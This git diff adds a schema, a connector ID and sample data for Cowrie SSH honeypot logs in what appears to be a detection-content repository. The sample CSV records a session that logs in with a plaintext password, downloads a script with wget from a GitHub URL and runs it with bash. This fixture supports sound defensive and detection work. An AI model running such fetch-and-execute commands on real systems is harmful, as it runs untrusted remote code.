diff --git a/.script/tests/KqlvalidationsTests/CustomTables/newCowrie_CL.json b/.script/tests/KqlvalidationsTests/CustomTables/newCowrie_CL.json new file mode 100644 index 00000000000..6e8f6a95f94 --- /dev/null +++ b/.script/tests/KqlvalidationsTests/CustomTables/newCowrie_CL.json @@ -0,0 +1,13 @@ +{ + "Name": "newCowrie_CL", + "Properties": [ + { + "Name": "TimeGenerated", + "Type": "DateTime" + }, + { + "Name": "RawData", + "Type": "String" + } + ] +} \ No newline at end of file diff --git a/.script/tests/detectionTemplateSchemaValidation/ValidConnectorIds.json b/.script/tests/detectionTemplateSchemaValidation/ValidConnectorIds.json index 3ed71726d42..9a8a0427840 100644 --- a/.script/tests/detectionTemplateSchemaValidation/ValidConnectorIds.json +++ b/.script/tests/detectionTemplateSchemaValidation/ValidConnectorIds.json @@ -250,6 +250,7 @@ "RadiflowIsid", "CustomLogsAma", "SilverfortAma", + "SensorSSHCowrie", "IllumioSaaSDataConnector", "CTERA" ] \ No newline at end of file diff --git a/Sample Data/Custom/newCowrie_CL.csv b/Sample Data/Custom/newCowrie_CL.csv new file mode 100644 index 00000000000..2e72019024f --- /dev/null +++ b/Sample Data/Custom/newCowrie_CL.csv @@ -0,0 +1,705 @@ +"TimeGenerated [UTC]","Timestamp [UTC]",RawData,Message,Severity,TenantId,Type,"_ResourceId" +"9/20/2024, 3:53:47.935 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""45.168.176.36"",""src_port"":39266,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""a619d69162d9"",""protocol"":""ssh"",""message"":""New connection: 45.168.176.36:39266 (10.0.0.4:2222) [session: a619d69162d9]"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:53:47.934557Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:53:47.937 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.0004012584686279297,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:53:47.936345Z"",""src_ip"":""45.168.176.36"",""session"":""a619d69162d9""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:28.643 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""172.172.34.12"",""src_port"":22159,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""9f8984885fc0"",""protocol"":""ssh"",""message"":""New connection: 172.172.34.12:22159 (10.0.0.4:2222) [session: 9f8984885fc0]"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:28.642670Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:28.645 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-PuTTY_Release_0.81"",""message"":""Remote SSH version: SSH-2.0-PuTTY_Release_0.81"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:28.644170Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:28.707 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""1dd4d89cd6b7a1f7b06acf808260c130"",""hasshAlgorithms"":""sntrup761x25519-sha512@openssh.com,curve448-sha512,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group18-sha512,diffie-hellman-group17-sha512,diffie-hellman-group16-sha512,diffie-hellman-group15-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,rsa2048-sha256,rsa1024-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,3des-ctr,3des-cbc,blowfish-ctr,blowfish-cbc,arcfour256,arcfour128;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com;none,zlib,zlib@openssh.com"",""kexAlgs"":[""sntrup761x25519-sha512@openssh.com"",""curve448-sha512"",""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group18-sha512"",""diffie-hellman-group17-sha512"",""diffie-hellman-group16-sha512"",""diffie-hellman-group15-sha512"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""rsa2048-sha256"",""rsa1024-sha1"",""diffie-hellman-group1-sha1"",""ext-info-c"",""kex-strict-c-v00@openssh.com""],""keyAlgs"":[""ssh-ed25519"",""ssh-ed448"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes256-ctr"",""aes256-cbc"",""rijndael-cbc@lysator.liu.se"",""aes192-ctr"",""aes192-cbc"",""aes128-ctr"",""aes128-cbc"",""chacha20-poly1305@openssh.com"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""3des-ctr"",""3des-cbc"",""blowfish-ctr"",""blowfish-cbc"",""arcfour256"",""arcfour128""],""macCS"":[""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1"",""hmac-sha1-96"",""hmac-md5"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-etm@openssh.com""],""compCS"":[""none"",""zlib"",""zlib@openssh.com""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 1dd4d89cd6b7a1f7b06acf808260c130"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:28.705045Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:49.709 AM",,"{""eventid"":""cowrie.login.success"",""username"":""jack"",""password"":""MCdoWell07@"",""message"":""login attempt [jack/MCdoWell07@] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:49.708604Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:49.837 AM",,"{""eventid"":""cowrie.client.size"",""width"":80,""height"":24,""message"":""Terminal Size: 80 24"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:49.836883Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:49.842 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:49.838759Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:52.976 AM",,"{""eventid"":""cowrie.command.input"",""input"":""ls -la"",""message"":""CMD: ls -la"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:52.976142Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:55.825 AM",,"{""eventid"":""cowrie.command.input"",""input"":""cd .."",""message"":""CMD: cd .."",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:55.823923Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:56.614 AM",,"{""eventid"":""cowrie.command.input"",""input"":""ls"",""message"":""CMD: ls"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:56.612267Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:59.495 AM",,"{""eventid"":""cowrie.command.input"",""input"":""cd phil"",""message"":""CMD: cd phil"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:59.493528Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:09.351 AM",,"{""eventid"":""cowrie.command.input"",""input"":""ps aux"",""message"":""CMD: ps aux"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:09.350115Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:18.662 AM",,"{""eventid"":""cowrie.command.input"",""input"":""tree"",""message"":""CMD: tree"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:18.661042Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:18.664 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""tree"",""message"":""Command not found: tree"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:18.663907Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:33.551 AM",,"{""eventid"":""cowrie.command.input"",""input"":""wget https://raw.githubusercontent.com/swiftsolves-msft/projhpcowrie/refs/heads/main/script.sh"",""message"":""CMD: wget https://raw.githubusercontent.com/swiftsolves-msft/projhpcowrie/refs/heads/main/script.sh"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:33.549627Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:33.680 AM",,"{""eventid"":""cowrie.session.file_download"",""url"":""https://raw.githubusercontent.com/swiftsolves-msft/projhpcowrie/refs/heads/main/script.sh"",""outfile"":""var/lib/cowrie/downloads/3ff168ffcf3ddf450be0f94b4bd98a51c48584a79e7c42e7ac98d14fc58dd08e"",""shasum"":""3ff168ffcf3ddf450be0f94b4bd98a51c48584a79e7c42e7ac98d14fc58dd08e"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:33.676964Z"",""message"":""Downloaded URL (https://raw.githubusercontent.com/swiftsolves-msft/projhpcowrie/refs/heads/main/script.sh) with SHA-256 3ff168ffcf3ddf450be0f94b4bd98a51c48584a79e7c42e7ac98d14fc58dd08e to var/lib/cowrie/downloads/3ff168ffcf3ddf450be0f94b4bd98a51c48584a79e7c42e7ac98d14fc58dd08e"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:35.163 AM",,"{""eventid"":""cowrie.command.input"",""input"":""ls"",""message"":""CMD: ls"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:35.162013Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:39.355 AM",,"{""eventid"":""cowrie.command.input"",""input"":""cat script.sh "",""message"":""CMD: cat script.sh "",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:39.354324Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:49.258 AM",,"{""eventid"":""cowrie.command.input"",""input"":""./script.sh "",""message"":""CMD: ./script.sh "",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:49.258195Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:49.261 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""./script.sh"",""message"":""Command not found: ./script.sh"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:49.260750Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:59.220 AM",,"{""eventid"":""cowrie.command.input"",""input"":""bash ./script.sh "",""message"":""CMD: bash ./script.sh "",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:59.219689Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:30:03.750 AM",,"{""eventid"":""cowrie.command.input"",""input"":""exit"",""message"":""CMD: exit"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:30:03.749112Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:30:03.755 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/ce059bf64cbd71d981255c1c75c1f75428fc5244eadfc49725dc827a6cc0c554"",""size"":9881,""shasum"":""ce059bf64cbd71d981255c1c75c1f75428fc5244eadfc49725dc827a6cc0c554"",""duplicate"":false,""duration"":73.91482973098755,""message"":""Closing TTY Log: var/lib/cowrie/tty/ce059bf64cbd71d981255c1c75c1f75428fc5244eadfc49725dc827a6cc0c554 after 73 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:30:03.753066Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:30:03.785 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":95.14055728912354,""message"":""Connection lost after 95 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:30:03.784592Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:33:56.472 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""74.82.47.3"",""src_port"":27804,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1123e1b16048"",""protocol"":""ssh"",""message"":""New connection: 74.82.47.3:27804 (10.0.0.4:2222) [session: 1123e1b16048]"",""sensor"":""server01"",""timestamp"":""2024-09-20T05:33:56.471478Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:33:56.473 AM",,"{""eventid"":""cowrie.client.version"",""version"":""\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xa7b\\x94\u000b3\\xab\\xfe\\xfb\\xaeLt\u0000\\xe9W\\xb9?\u0007\\xc6\\xde.\\x9a\\xb6\\xe2"",""message"":""Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xa7b\\x94\u000b3\\xab\\xfe\\xfb\\xaeLt\u0000\\xe9W\\xb9?\u0007\\xc6\\xde.\\x9a\\xb6\\xe2"",""sensor"":""server01"",""timestamp"":""2024-09-20T05:33:56.473057Z"",""src_ip"":""74.82.47.3"",""session"":""1123e1b16048""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:33:56.475 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.001626729965209961,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T05:33:56.474536Z"",""src_ip"":""74.82.47.3"",""session"":""1123e1b16048""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:13.986 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":33300,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""78e060079161"",""protocol"":""ssh"",""message"":""New connection: 192.155.90.118:33300 (10.0.0.4:2222) [session: 78e060079161]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:13.985449Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.054 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.053678Z"",""src_ip"":""192.155.90.118"",""session"":""78e060079161""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.056 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.054872Z"",""src_ip"":""192.155.90.118"",""session"":""78e060079161""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.293 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.3059194087982178,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.292752Z"",""src_ip"":""192.155.90.118"",""session"":""78e060079161""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.318 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":33302,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""d144ea1ed65e"",""protocol"":""ssh"",""message"":""New connection: 192.155.90.118:33302 (10.0.0.4:2222) [session: d144ea1ed65e]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.317523Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.618 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.618000Z"",""src_ip"":""192.155.90.118"",""session"":""d144ea1ed65e""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.621 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.619271Z"",""src_ip"":""192.155.90.118"",""session"":""d144ea1ed65e""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.973 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.6540555953979492,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.972852Z"",""src_ip"":""192.155.90.118"",""session"":""d144ea1ed65e""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.998 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":33304,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""37d8a9aeed34"",""protocol"":""ssh"",""message"":""New connection: 192.155.90.118:33304 (10.0.0.4:2222) [session: 37d8a9aeed34]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.997520Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:15.492 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:15.491431Z"",""src_ip"":""192.155.90.118"",""session"":""37d8a9aeed34""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:15.494 